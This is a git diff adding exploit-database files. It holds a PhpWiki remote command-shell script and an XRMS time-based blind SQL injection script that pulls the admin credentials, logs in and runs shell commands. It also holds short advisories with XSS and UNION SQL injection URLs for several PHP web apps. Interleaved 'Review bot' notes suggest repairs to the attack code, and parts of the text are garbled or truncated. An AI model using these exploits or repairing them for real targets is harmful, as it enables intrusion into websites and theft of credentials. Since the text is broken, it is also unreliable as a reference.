@@ -0,0 +1,53 @@ +############################################################### +# ____ __ _ __ _ +# / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_) +# / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / +# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / +#/_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ +# /_/ /_/ /_/ +# Diskovered in Nov/Dec 2011 +############################################################### + +import urllib +import urllib2 +import sys +def banner(): + print " ____ __ _ __ _ " + print " / __/_ ______ _ ____ / /_ ____ _ __(_) /__(_)" + print " / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / " + print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / " + print " /_/ \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ " + print " /_/ /_/ /_/ \n" + + +def usage(): + banner() + print " [+] Usage example" + print " [-] python " + sys.argv[0] + " http://path.to/wiki" + +if len(sys.argv)< 2: + usage() + quit() + +domain = sys.argv[1] +def commandexec(cmd): + data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<>'),('edit[preview]','Preview'),('action','edit')]) + cmd1 = urllib2.Request(domain +'/index.php/HeIp',data) + cmd2 = urllib2.urlopen(cmd1) + output = cmd2.read() + firstloc = output.find("123:::\n") + len("123:::\n") + secondloc = output.find("\n:::123") + return output[firstloc:secondloc] + + +banner() +print commandexec('uname -a') +print commandexec('id') +while(quit != 1): + cmd = raw_input('Run a command: ') + if cmd == 'quit': + print "[-] Hope you had fun :)" + quit = 1 + if cmd != 'quit': + print commandexec(cmd) + diff --git a/platforms/php/webapps/34452.py b/platforms/php/webapps/34452.py new file mode 100755 index 000000000..dc24231d8 --- /dev/null +++ b/platforms/php/webapps/34452.py 
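Review bot: `commandexec(cmd)` in 34451.py never uses its `cmd` argument — `edit[content]` is the literal `'<>'` — so every call posts the same preview and returns the same text; presumably the PhpWiki plugin payload that embedded `cmd` was stripped as markup, and the file is unusable until it is restored. The two `output.find("123:::\n")` lookups do not check for `-1`, so when the markers are absent `firstloc` becomes 6 and the function returns an arbitrary slice of the page instead of signalling failure; add `if firstloc < 0 or secondloc < 0: return ''` after the second `find`. The loop `while(quit != 1)` reads the builtin `quit` object before the module-level `quit = 1` assignment and only terminates because that object compares unequal to 1; `while True:` with `break` on `'quit'` is the intended shape, and the trailing `if cmd != 'quit':` would then become `else:`.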
@@ -0,0 +1,233 @@
+#######################
+# XRMS Blind SQLi via $_SESSION poisoning, then command exec
+#########################
+
+import urllib
+import urllib2
+import time
+import sys
+
+usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
+userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
+def banner():
+ print """ ____
+ / __/_ ______ _ _ ___________ ___ _____
+ / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
+ / __/ /_/ / /_/ / _> ','')
+ print " [-] Plaintext of hash: " +plaintext + "\n"
+ return plaintext
+
+def username(length):
+ length = length + 1
+ duser = []
+ #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
+ found = 0
+ i = 1
+ payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
+ payload2 = ",1)=CHAR("
+ payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
+ for i in range(1,length):
+ found = 0
+ while(found != 1):
+ for f in range(0,len(userascii)):
+ class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+ def http_error_302(self, req, fp, code, msg, headers):
+ infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+ infourl.status = code
+ infourl.code = code
+ return infourl
+ http_error_300 = http_error_302
+ class HeadRequest(urllib2.Request):
+ def get_method(self):
+ return "POST"
+ payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
+ data = urllib.urlencode([('user_id',payload)])
+ url = 'http://'+domain+'/plugins/webform/new-form.php'
+ opener = urllib2.build_opener(LeHTTPRedirectHandler)
+ req = HeadRequest(url,data)
+ prepare = opener.open(req)
+ cookie1 = prepare.info()
+ cookie2pos1 = str(cookie1).find('PHPSESSID')
+ cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+ line =
str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+ line = 'XRMS' + line[9:]
+ url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+ headers = { 'Cookie' : line }
+ data = None
+ start = time.time()
+ get = urllib2.Request(url,data,headers)
+ get.get_method = lambda: 'HEAD'
+ try:
+ execute = urllib2.urlopen(get)
+ except:
+ pass
+ elapsed = (time.time() - start)
+ if(elapsed > 1):
+ print " Character found. Character is: " + usercharac[f]
+ duser.append(usercharac[f])
+ found = 1
+ return duser
+
+def getusernamelength():
+ found = 0
+ i = 1
+ payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
+ payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
+ while (found != 1):
+ class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+ def http_error_302(self, req, fp, code, msg, headers):
+ infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+ infourl.status = code
+ infourl.code = code
+ return infourl
+ http_error_300 = http_error_302
+ class HeadRequest(urllib2.Request):
+ def get_method(self):
+ return "POST"
+ payload = payload1 + str(i) + payload2
+ data = urllib.urlencode([('user_id',payload)])
+ url = 'http://'+domain+'/plugins/webform/new-form.php'
+ opener = urllib2.build_opener(LeHTTPRedirectHandler)
+ req = HeadRequest(url,data)
+ prepare = opener.open(req)
+ cookie1 = prepare.info()
+ cookie2pos1 = str(cookie1).find('PHPSESSID')
+ cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+ line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+ line = 'XRMS' + line[9:]
+ url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+ headers = { 'Cookie' : line }
+ data = None
+ start = time.time()
+ get = urllib2.Request(url,data,headers)
+ get.get_method = lambda: 'HEAD'
+ try:
+ execute = urllib2.urlopen(get)
+ except:
+ pass
+ elapsed = (time.time() - start)
+ if(elapsed > 1):
+ print " Length found at position: " + str(i)
+ found = 1
+ length = i
+ return length
+ i = i + 1
+
+def password(length):
+ length = length +
1
+ dpassword = []
+ #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
+ found = 0
+ i = 1
+ payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
+ payload2 = ",1)=CHAR("
+ payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
+ for i in range(1,length):
+ found = 0
+ while(found != 1):
+ for f in range(0,len(userascii)):
+ class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+ def http_error_302(self, req, fp, code, msg, headers):
+ infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+ infourl.status = code
+ infourl.code = code
+ return infourl
+ http_error_300 = http_error_302
+ class HeadRequest(urllib2.Request):
+ def get_method(self):
+ return "POST"
+ payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
+ data = urllib.urlencode([('user_id',payload)])
+ url = 'http://'+domain+'/plugins/webform/new-form.php'
+ opener = urllib2.build_opener(LeHTTPRedirectHandler)
+ req = HeadRequest(url,data)
+ prepare = opener.open(req)
+ cookie1 = prepare.info()
+ cookie2pos1 = str(cookie1).find('PHPSESSID')
+ cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+ line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+ line = 'XRMS' + line[9:]
+ url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+ headers = { 'Cookie' : line }
+ data = None
+ start = time.time()
+ get = urllib2.Request(url,data,headers)
+ get.get_method = lambda: 'HEAD'
+ try:
+ execute = urllib2.urlopen(get)
+ except:
+ pass
+ elapsed = (time.time() - start)
+ if(elapsed > 1):
+ print " Character found.
Character is: " + usercharac[f]
+ dpassword.append(usercharac[f])
+ found = 1
+ return dpassword
+
+def login(domain,user,password):
+ cookie = "XRMS=iseeurgettinown4d"
+ url = 'http://'+domain+'/login-2.php'
+ headers = { 'Cookie' : cookie }
+ data = urllib.urlencode([('username',user),('password',password)])
+ a1 = urllib2.Request(url,data,headers)
+ a2 = urllib2.urlopen(a1)
+ output = a2.read()
+ if output.find('PEAR.php') > 0:
+ print " [+] Logged In"
+
+def commandexec(domain,command):
+ cookie = "XRMS=iseeurgettinown4d"
+ cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
+ headers = { 'Cookie' : cookie }
+ data = None
+ url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
+ b1 = urllib2.Request(url,data,headers)
+ b2 = urllib2.urlopen(a1)
+ output = b2.read()
+ first = output.find('0x41') + 4
+ last = output.find('14x0') - 4
+ return output[first:last]
+
+banner()
+if len(sys.argv) < 2:
+ usage()
+domain = sys.argv[1]
+print " [+] Grabbing username length"
+length = getusernamelength()
+print " [+] Grabbing username characters"
+tmpuser = username(length)
+adminusr = "".join(tmpuser)
+print " [+] Grabbing password hash"
+tmppass = password(32)
+admpass = "".join(tmppass)
+print " [+] Admin username: "+ adminusr
+print " [+] Admin password hash: " + admpass
+plain = sendhashaway(admpass)
+login(domain,adminusr,plain)
+while(quit != 1):
+ cmd = raw_input(' [+] Run a command: ')
+ if cmd == 'quit':
+ print " [-] Hope you had fun :)"
+ quit = 1
+ if cmd != 'quit':
+ print " [+] "+ commandexec(domain,cmd)
+
diff --git a/platforms/php/webapps/34453.txt b/platforms/php/webapps/34453.txt
new file mode 100755
index 000000000..e38b307f2
--- /dev/null
+++ b/platforms/php/webapps/34453.txt
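Review bot: This copy of the hunk is truncated inside `banner()`: the line `+ / __/ /_/ / /_/ / _> ','')` splices the ASCII art straight into the tail of `sendhashaway`, so the rest of the banner, `usage()` and the start of `sendhashaway` are missing here, presumably because text between a `<` and a `>` was dropped when the page was rendered; the raw patch should be compared before this rendering is used as a reference. The header comment is also thin for a defender: it names neither the affected XRMS version nor the two endpoints the script touches (`plugins/webform/new-form.php` via the POSTed `user_id` field, and `plugins/useradmin/fingeruser.php` via the `username` query parameter under the `XRMS` session cookie), which is exactly what an administrator checking exposure or writing a detection rule needs; a line such as `# Affected: XRMS <version — see index entry>; vectors: user_id on plugins/webform/new-form.php, username on plugins/useradmin/fingeruser.php` would cover it. On style, `LeHTTPRedirectHandler` and `HeadRequest` are redefined on every iteration of the innermost loop in `username`, `getusernamelength` and `password`, and the request/timing sequence is copied verbatim across all three; defining the two classes once at module level and factoring the probe into one helper would remove most of the duplication. The bare `except: pass` around `urlopen` in each probe also hides every transport error, which makes the timing measurement that follows unreliable.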
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42423/info
+
+PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PaoBacheca 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/paobacheca/demo/index.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/34454.txt b/platforms/php/webapps/34454.txt
new file mode 100755
index 000000000..b776c94f2
--- /dev/null
+++ b/platforms/php/webapps/34454.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42423/info
+
+PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PaoBacheca 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/paobacheca/demo/scrivi.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/34455.txt b/platforms/php/webapps/34455.txt
new file mode 100755
index 000000000..5aebdf615
--- /dev/null
+++ b/platforms/php/webapps/34455.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/42424/info
+
+Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
+http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4--
\ No newline at end of file
diff --git a/platforms/php/webapps/34456.txt b/platforms/php/webapps/34456.txt
new file mode 100755
index 000000000..ae27266f1
--- /dev/null
+++ b/platforms/php/webapps/34456.txt
@@ -0,0 +1,132 @@
+source: http://www.securityfocus.com/bid/42425/info
+
+JBoard is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JBoard 0.2 is vulnerable; prior versions may also be affected.
+
+================================================
+JBoard <= 2.0 Commercial Version Sql/Xss Exploit
+================================================
+
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 0
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
+
+#[+] Discovered By : Inj3ct0r
+#[+] Site : Inj3ct0r.com
+#[+] Support e-mail : submit[at]inj3ct0r.com
+#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
+
+
+Site product: http://allpublication.ru/
+Demo: http://allpublication.ru/board/demo/
+admin; admin
+Version: 2.0
+
+-----------------------------------------------------------------
+
+Xss Exploit:
+
+editform.php?notice=
+
+*?user_title=
+
+*any pages because vulnerability in inc/head.inc.php
+
+core/edit_user_message.php?edit_user_message=">